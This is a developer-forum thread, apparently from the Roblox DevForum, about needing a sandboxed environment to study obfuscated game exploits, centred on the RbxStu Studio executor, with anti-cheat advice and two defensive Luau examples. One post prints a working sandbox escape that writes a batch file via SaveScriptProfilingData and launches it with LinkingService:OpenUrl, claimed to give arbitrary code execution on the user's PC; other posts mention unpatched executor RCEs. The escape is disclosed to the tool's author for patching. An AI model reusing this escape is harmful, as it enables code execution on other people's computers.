Provide an exploit investigation environment

Ultimately I don’t think we can encourage or endorse the use of external tooling like RbxStu, but I can say we have absolutely no plans as of this post to police Studio with anticheat. So, as of now it’s possible to use tools like these without concern of the usage of these being moderated/detected.

Obviously outside of Studio this is a different story, and also this should not be taken as blanket permission to use tools like these since this breaks our ToS. All I can say is there’s no anticheat in Studio and no plans to add it there as of now.

22 Likes
16 Likes

Whilst I created RbxStu for the purposes of pentesting your own games, it is meant really to execute untrusted exploiter code. As such I didn’t want to risk some things; this is why things like the UNC IO library are NOT in, and might never be in. As such I wanted to avoid as much as possible implementing vulnerable things, but it is just really impossible, as an exploit environment like so has primitives like game:HttpGet and hookfunction that allow you to break out of the sandbox easily and break a game’s entire integrity. Whilst I tried to secure some of the functions you may have available at high contexts, it is still risky to run RbxStu until I do either of two things:

1 - Close source

Make RbxStu closed source, how it was originally going to be. This completely stops knowledgeable exploiters from looking through the code and exploiting vulnerabilities that might have been clear to them but were not to me; however, this is unfeasible for many reasons.

2 - Open source, but complete rewrite

Continue RbxStu as an open source project, but rewrite it from scratch, something like a V2, with better structure overall, and perhaps completely automatic updating, as Roblox Studio does not have any aggressive protections like shuffling structs.

Whilst RbxStu was never made to cause damage to Roblox as a platform at any point, and I haven’t heard of it much more than from some friends using it to patch scripts or antitamper/cheat development for their games, all of this without using any third party tools that might compromise their system, as I provide the source and DLL for you to inject into your Studio if you want to do anything, I try as much as possible to make it easy to find what the script may be using to do anything to the game (including exploit functions). Thanks to RbxStu, @shadowmaster940 and I are working on another project, that for now goes unspecified, but that would virtually be some kind of generic anti-tamper, and that would be open source, but I digress.

It is completely understandable that Roblox does not endorse the tool; it goes directly against their ToS, and they would not want to make an exploiter-like tool either, because when implementing libraries such as io and others, if those are vulnerable, it’s not as simple as “It is a third party”: it would be Roblox the one allowing it, not you going out of your way to get external tooling.

(And yes, RbxStu may eventually get a rewrite to be much more stable, but until then it’s just too sporadic on what stability refers to, so if you DO choose to use it, bear in mind your Studio will most likely crash, and even then you will have to roll back to an older version, as I haven’t had the time to update the offsets to the latest Studio version).

16 Likes

I appreciate you replying here. I also think this situation perfectly captures the issue developers face that is part of what I’m trying to highlight generally to the community and perhaps contribute to pushing for change in some way.

Roblox treats all users equally and I have a lot of respect for that approach, I don’t think it should change, it’s one of the core premises the platform was built on and thrives on.

However, it also results in this awful situation developers find themselves in. I, the same as the vast majority of developers, have never written a single line of code with malicious intent in my life. We dedicate our lives to creating these games while we work on them. Exploits can destroy that work. I don’t blame the people who wrote them or Roblox for their existence, I simply want to fix them and prevent them. The people who create them have very little to lose, their livelihoods don’t depend on a single Roblox account, they won’t lose years of work if they’re banned. We will.

I can’t download one of these script executors, I doubt I would be treated any differently by the systems and moderators if detected using one in my own game. What are we supposed to do? Use an old laptop with a VPN and a new account, hoping it doesn’t disconnect and we are grouped in with the people we are trying to fight against? I wouldn’t risk it.

@roalex2008 here is trying to do something good. They should be appreciated for that, but instead they have to constantly worry that what they are working on might go against the ToS. I don’t mean this against any Roblox staff in this thread but against the way things are in general. We don’t feel safe combatting this in the only ways that are really possible and it’s not the exploiters that we are most scared of, it’s Roblox itself.

And I should say that I’m not at all trying to say that all exploits require this, in most cases securing a game from a known or unknown exploit can be done with enough knowledge but it’s just not always the case. I doubt Roblox would be anywhere near as effective at site and engine security if it wasn’t for your ability to reverse engineer known exploits in a privileged sandboxed environment.

14 Likes

Understood.

Another suggestion I would make generally is a program of trusted developers where we can submit exploits we are struggling with to Roblox, perhaps only in extreme/ specific cases based on criteria. If Roblox must keep such an environment private then a developer program like this could centralise efforts against common obfuscation techniques, and provide those staff with continuous insight into the latest methods being used, and give a place for developers and the security team to work together and directly benefit developers at the same time.

The big issue isn’t with fixing an exploit once we know what it’s doing, it’s that these days they are so heavily obfuscated there’s little option but to reverse engineer them to try and figure out what they’re even doing.

13 Likes

I mean, I used to be an exploiter; the fun wears off in games too simply, it’s not worth it to exploit at all. The only times I “Exploit” now is with auto clickers, and that is on really abusive games with the player, filled with dark patterns that make them unplayable.

Roblox is not particularly looming against me, I’d say. I have said many times I have no problem with taking down RbxStu if any Roblox staff is concerned about it having some repercussion; I’m open to taking it down, archiving/deleting the repo and keeping it for private use only.

Still, some people say “Validation fixes everything!”. It really does do wonders, but people undermine the power a client has in games like Obbys, for example, where kill bricks can be completely deactivated with some little mangling.

I truly do NOT recommend you use any executor, at ALL. I know some of the owners, they’re good and sometimes fairly goofy, the Solara owner does it for literal learning, which I find amusing, but the problem is, you should not benefit the cheating industry, and if you do, you will end up getting banned eventually, as EVERYTHING that is currently released is detected, and Hyperion will not make any “Ah you’re doing it with good intent” kind of deal, they will whack you straight up, and that is great tbf.

RbxStu is practically a learning project. I took various actual client exploits and just started experimenting with how they implemented custom functions and other deals; the way of getting the state IS unstable, and that really cannot change unless I rewrite it, which I don’t really know when I will.

As a rule of thumb for exploit protection: don’t trust the client, and treat your remote inputs as the devil. If you are willing to sacrifice developer experience for security, turn to using something like ByteNet or Zap; they’re net libs that essentially make all your networking go through buffers, and that makes exploiting much tougher when your data goes through remotes, because you simply cannot peek in to see what happens. Normally this will fend off most people who just don’t care enough or aren’t determined enough. If you’re worried about your environment being hooked, you can try running some important parts of the game inside of Actor | Documentation - Roblox Creator Hub, which, despite not being an anticheat tool per se, makes a whole new Lua VM where the scripts run, making it so hooking is basically impossible unless they have a function called run_on_actor, which allows them to execute code in them. Most fancy games, like Phantom Forces, use actors on their anti-cheat stack for reasons like that.

You can also improve the game by adding delayed bans. Why, you may ask? Delayed bans make it so if you detect something, it doesn’t scream at the player “I detected you, cheater”; it rather sends them the message “I bypassed this, fool developer”, but in reality it is just a honeypot, and when they release the detected feature, all the ones who cheated are now detected, flagged and will, eventually, get banned.

20 Likes
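The validation and delayed-ban advice in the post above, as an added Luau example that is not RbxStu’s or the poster’s code: the RemoteEvent name “HitRequest” and the damage, reach and rate limits are constructed, and the Roblox wiring is skipped when the file is run as plain Lua.

```lua
-- Added example (not RbxStu's or the thread's code): hostile-input validation
-- for a RemoteEvent plus silent strike counting for a delayed ban.
local MAX_DAMAGE_PER_HIT, MAX_HITS_PER_SECOND, MAX_REACH_STUDS = 35, 4, 12  -- constructed tuning values
local STRIKE_THRESHOLD = 5
local state = {}   -- userId -> { hits = {timestamps}, strikes = n }
local function stateFor(userId)
    state[userId] = state[userId] or { hits = {}, strikes = 0 }
    return state[userId]
end
-- Every field the client sent is hostile until type-, range- and rate-checked.
-- Returns true, or false plus a reason that is logged server-side, never echoed.
local function validateHit(userId, payload, now)
    if type(payload) ~= "table" then return false, "payload not a table" end
    local dmg, dist = payload.damage, payload.distance
    if type(dmg) ~= "number" or dmg ~= dmg or dmg <= 0 or dmg > MAX_DAMAGE_PER_HIT then
        return false, "damage out of range"   -- dmg ~= dmg catches NaN
    end
    if type(dist) ~= "number" or dist < 0 or dist > MAX_REACH_STUDS then
        return false, "target out of reach"
    end
    local s, recent = stateFor(userId), {}
    for _, t in ipairs(s.hits) do   -- keep only hits from the last second
        if now - t < 1 then table.insert(recent, t) end
    end
    s.hits = recent
    if #recent >= MAX_HITS_PER_SECOND then return false, "rate limit" end
    table.insert(recent, now)
    return true
end
-- Delayed-ban bookkeeping: count the strike and report whether the player is
-- now due for action; enforcement happens in a later sweep, so the cheater
-- sees their "bypass" appear to work instead of an instant kick.
local function recordStrike(userId)
    local s = stateFor(userId)
    s.strikes = s.strikes + 1
    return s.strikes >= STRIKE_THRESHOLD
end
if game then   -- Roblox wiring only; "HitRequest" is a constructed RemoteEvent name
    local remote = game:GetService("ReplicatedStorage"):WaitForChild("HitRequest")
    remote.OnServerEvent:Connect(function(player, payload)
        if validateHit(player.UserId, payload, os.clock()) then
            -- apply the damage here from server-side state only
        else
            recordStrike(player.UserId)   -- silent: no kick, no message
        end
    end)
end
-- Constructed offline demo: one player spams six hits inside one second.
for i = 1, 6 do
    local ok, why = validateHit(1001, { damage = 20, distance = 5 }, 10 + i * 0.1)
    if not ok then print("strike:", why, "due for action:", recordStrike(1001)) end
end
```

A periodic server-side sweep over `state` is where players past STRIKE_THRESHOLD actually get actioned; the reason strings stay in server logs and are never sent back to the client.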

As much as we want to do something about obfuscation, it will never really be “solved”. What you can do is make detections for their UIs; most exploiters use the same UI library, like Rayfield. This allows you to just detect that UI lib and make them unable to do anything about it. Anti-cheat things are mostly @shadowmaster940’s stuff; I’m mostly just playing around and learning myself on the go, which as a side effect resulted in the little experiment I wrote with shadow, which is like a weird general purpose anti-tamper. It can be found on my GitHub as “zoop”, but it’s too experimental, and straight up has little to no detections in place to do much to really recommend it. As deobfuscation was really something out of the window, I simply wrote RbxStu, and wrote some cheap and simple “Environment Instrumentation”, as I call it, which just shows me what calls the exploit environment makes, and you can get one or two things from the script that way while trying to replicate exploit behaviour to let it continue. I sadly cannot ever see RbxStu in action, as I have never done a game by myself that has gotten other exploiters’ attention.

13 Likes

These library names are incredible :joy::joy:

I mean, this all sounds great. I will likely check it out, and thanks for the warnings regarding the stability of it. Do you recommend any particular safeguards in place to prevent any kind of lasting damage in the worst case from one of these scripts, should they be written maliciously against reverse engineering itself? Is running in a baseplate enough, or do I need to be more careful than that?

14 Likes

I’d probably say running it on a game copy, as in, a local place copy could solve some of the issues relating to security, but then it may act weirdly, the problem is I’m yet to see a script that directly attacks RbxStu, so for now I’m at a miss if it is happening sadly. That aside.

There are some checks to protect against malicious scripters, as I’d call them. There are metamethod hooks set on the DataModel to prevent indexing services and functions deemed dangerous; if there are bypasses for them, I have not been aware of them. However, when I first had the chance to check the security of RbxStu regarding env stuff, I checked with a script made by someone and it passed all its tests, so you have that as a “Passes Vulnerability Check!” trademark I suppose, but it’s not enough. When performing HttpGet it will block Discord webhooks, so you’re not logged, for example; in the future I’d like that feature to extend to a list of blocked URLs or something along those lines.

10 Likes

The code below achieves arbitrary code execution in RLua environments with a thread identity higher than 2! Run batch files, powershell files, anything you can think of! In the PC of Roblox Exploiters!

(Works in RbxStu!)

ScriptContext = game:FindService('ScriptContext')
LinkingService = game:FindService('LinkingService')

Code = "@echo off\nstart https://www.roblox.com/users/4497609693/profile"
Name = "omg.bat"
Path = ScriptContext:SaveScriptProfilingData(Code, Name) -- creates an omg.bat file with the code inside it, then returns the path to the batch file

-- opens the bat file resulting in arbitrary code execution
print(LinkingService:OpenUrl(Path)) -- if returned true, successful code execution

1 Like

alright? I don’t know what you expect me to tell you honestly, as I said before, I have to rewrite the entire thing either way, surely if you have enough time to find things like this, then you have enough time to do something that benefits it as a whole or make a better version of it, so be my guest.

Besides the point, LinkingService is relatively new, never heard of it; it was practically added a month ago. Coincidentally, the last RbxStu commit was ALSO a month ago, shocker. I’m not going to constantly check the update list for services that can be exploited like this, and what you pointed out about identities higher than 2 may not be true, because I’m pretty sure Plugins run at higher contexts and they most likely aren’t affected by it, since Roblox 100% wouldn’t allow that behaviour to happen either way…

I’ll update RbxStu to hot fix the vulnerability tomorrow.

I was working on a project “Drainer Drainer 123” which is aimed to test almost all vulnerabilities possible in Roblox Executors such as the one made by the very incompetent developer rexi, called Wave. I read this thread at the time that I had that code copied, and I saw that you said “I’m yet to see a script that directly attacks RbxStu” so I thought why not quickly paste it, lol.

Oh and, I’m pretty sure Plugins run at PluginSecurity which is identity 1. I may be wrong though.

1 Like

Last I checked PluginSecurity was more than LocalUser (Context wise) and identity wise I think they were level 5, either way Rexi is complete garbage, I once spoke to the guy, he kept insulting over my country of origin non stop lol.

As for the vulnerability checker, good that you wrote one, because actual true exploits these days aren’t even held to the scrutiny they originally used to have, so in general they’re much more vulnerable. That being said, RbxStu hasn’t updated in a month, and pretty much this service was added a month ago; coincidences are annoying. Either way, good work and thanks for informing about it. I already informed my server about it, and I’ll deploy a hotfix for it later tomorrow.

Plugin is indeed 5

The security of exploits fell off significantly since Synapse’s departure, all of the biggest nobodies in the community have but a clue on how to properly secure their exploits.

Wave is a great example of this: there are multiple unpatched RCEs, multiple detection methods, no clue how they expect to remain undetected from Hyperion if they can’t even remain undetected from game developers.

Solara is obviously a little harder, they’re external so their custom environment is non-existent, though you can still do the good ol’ preloadasync attacks on the stupid drawing library they use.

Anyways.

If you’re a game developer and still have issues with these exploits, feel free to DM me for a detection or two

4 Likes

Wanted to come back to this again to say that a Roblox-provided environment doesn’t need to actually give access to sensitive services; rather, what would work just as well is a simulated response, enough for such a tool to then build a profile of what an exploit is doing, i.e. what events it’s trying to fire, what remote addresses it’s trying to access, etc.

Feel free to send over any obfuscated scripts that you’re having trouble with.

It’s not really about detection anymore, the people still using the modern junk are well beyond the point where being ‘detected’ deters them. People still exploiting won’t care about detection unless their accounts get terminated. Why care when you can exploit for 7 months and only get slapped with a couple 1-day bans every now and then? The moderation is toothless.

As long as it can achieve injection/execution, people will pay for it.

6 Likes
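The call profiling described above (the simulated-response idea in this post, and the “Environment Instrumentation” mentioned earlier in the thread), as an added Lua/Luau example that is not RbxStu’s code: every unknown global becomes a recording proxy, so the untrusted script runs against fakes while its accesses and calls are logged. The sample script and its URL are constructed.

```lua
-- Added example (not RbxStu's instrumentation): a recording proxy environment
-- that runs an untrusted script against fake objects and logs what it touches.
local log = {}
-- Every access returns another recorder, so chains like game.X.Y:Z() resolve
-- without any real service existing; the path string is the profile entry.
local function proxy(path)
    return setmetatable({}, {
        __index = function(_, key)
            local child = path .. "." .. tostring(key)
            table.insert(log, { kind = "index", path = child })
            return proxy(child)
        end,
        __call = function(_, ...)   -- for a:b(x) the args are (a, x)
            local args = {}
            for i = 1, select("#", ...) do args[i] = tostring((select(i, ...))) end
            table.insert(log, { kind = "call", path = path, args = args })
            return proxy(path .. "()")   -- simulated return value, also recorded
        end,
        __concat = function(a, b) return tostring(a) .. tostring(b) end,
        __tostring = function() return "<" .. path .. ">" end,
    })
end
-- Harmless standard library is passed through so the script's own logic runs;
-- anything else (game, workspace, HttpGet, ...) becomes a recorder.
local function instrument(source)
    log = {}
    local env = setmetatable({ string = string, table = table, math = math,
        pairs = pairs, ipairs = ipairs, tostring = tostring, tonumber = tonumber,
        type = type, select = select, print = function() end }, {
        __index = function(_, name)
            table.insert(log, { kind = "global", path = tostring(name) })
            return proxy(tostring(name))
        end,
    })
    local chunk, err
    if setfenv then                          -- Lua 5.1 / Luau
        chunk, err = loadstring(source, "=untrusted")
        if chunk then setfenv(chunk, env) end
    else                                     -- Lua 5.2+
        chunk, err = load(source, "=untrusted", "t", env)
    end
    if not chunk then return nil, err end
    local ok, runErr = pcall(chunk)
    return log, (not ok) and runErr or nil
end
-- Constructed sample resembling the behaviour the thread describes.
local sample = [[
local stage2 = game:HttpGet("https://example.invalid/stage2")
game.ReplicatedStorage.GiveCash:FireServer(1000000)
]]
local profile = instrument(sample)
for _, e in ipairs(profile) do
    print(e.kind, e.path, e.args and table.concat(e.args, ", ") or "")
end
```

This profiles calls only: the script still executes on the interpreter, so run it in a disposable place copy (in Roblox, loadstring has to be enabled) and guard against non-terminating loops, since pcall has no timeout.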

I think the most bizarre part about the introduction of Hyperion is how infrequent the preventative measures it’s supposed to enact are. Why add an anti-tamper company to your portfolio if you’re going to remove folks who tamper with the game twice a year, and for a single day at a time at first blush, at that?

Just a head scratching decision that makes developing a competitive game experience on Roblox that much less desirable. Roblox’s bureaucracy when it comes to punishing cheaters has struggled to catch up for the past decade and a half, and the gap doesn’t seem to stop widening.

Between the lack of action on Hyperion detections and the seemingly half-baked Ban API (that can be bypassed simply by switching accounts, no VPN necessary!) - the response here has been lukewarm at best.

I’ve been on the platform since 2007 - and the lack of progress on this forefront has been disappointing.

4 Likes

Would be nice if as a developer you had the option to either directly be told when a player is detected in your game, and take your own action, or set a bar for how Roblox should be when banning players from your experience specifically, if Roblox doesn’t want to potentially give indicators about what Hyperion is up to, allow developers to essentially request that Roblox themselves ban players permanently from your game for e.g. if you have a high protection level.

1 Like

Correct me if I’m wrong, but is this in regards to just detecting an exploit that took place, but not having the tools to determine how the exploit worked?

You said that players are automatically completing certain game-wide actions; what do you mean by this? Are they teleporting their character, or abusing a remote event to trigger events? If you know what things in your game could allow the player to accomplish their goal, surely you will know what they are doing, right? I’m probably missing something.